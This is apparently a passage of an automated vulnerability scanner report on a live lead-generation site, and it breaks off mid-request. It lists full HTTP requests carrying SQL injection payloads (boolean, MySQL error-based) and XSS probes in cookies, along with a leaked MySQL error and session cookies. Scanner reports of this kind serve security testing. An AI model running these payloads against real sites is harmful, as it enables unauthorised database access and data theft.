Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 18190592'%20or%201%3d1--%20 and 18190592'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/bulo00/project.php18190592'%20or%201%3d1--%20?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:51:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=niupql1tielm44c7a4oieighu2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.insideup.com/ppc/leadflow/">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function
...[SNIP]...

Request 2

GET /ppc/leadflow/bulo00/project.php18190592'%20or%201%3d2--%20?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:51:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bkuih3ghg7rf727k12mmdkbe76; path=/
Content-Length: 125
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project.php18190592' or 1=2-- was not found on this server.</p>

1.14. http://www.insideup.com/ppc/leadflow/bulo00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.15. http://www.insideup.com/ppc/leadflow/bulo00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. The payloads 96573606'%20or%201%3d1--%20 and 96573606'%20or%201%3d2--%20 were each submitted in the address parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address96573606'%20or%201%3d1--%20&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 